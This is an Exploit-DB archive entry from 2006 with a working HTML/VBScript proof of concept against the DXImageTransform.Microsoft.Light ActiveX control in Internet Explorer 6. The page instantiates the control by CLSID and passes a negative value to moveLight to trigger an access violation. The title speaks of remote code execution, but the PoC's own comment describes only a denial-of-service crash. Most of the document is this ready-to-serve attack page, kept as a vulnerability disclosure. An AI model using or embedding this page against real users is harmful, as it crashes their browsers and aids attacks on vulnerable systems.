Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution

EDB-ID:

27984




Platform:

Windows

Date:

2006-06-13


source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. 

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description: 
Sub moveLight (
 	ByVal lightNum  As Long , 
 	ByVal x  As Long , 
 	ByVal y  As Long , 
 	ByVal z  As Long , 
 	ByVal fAbsolute  As Long 
)
Supplying negative parameters throws an access violation. 
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">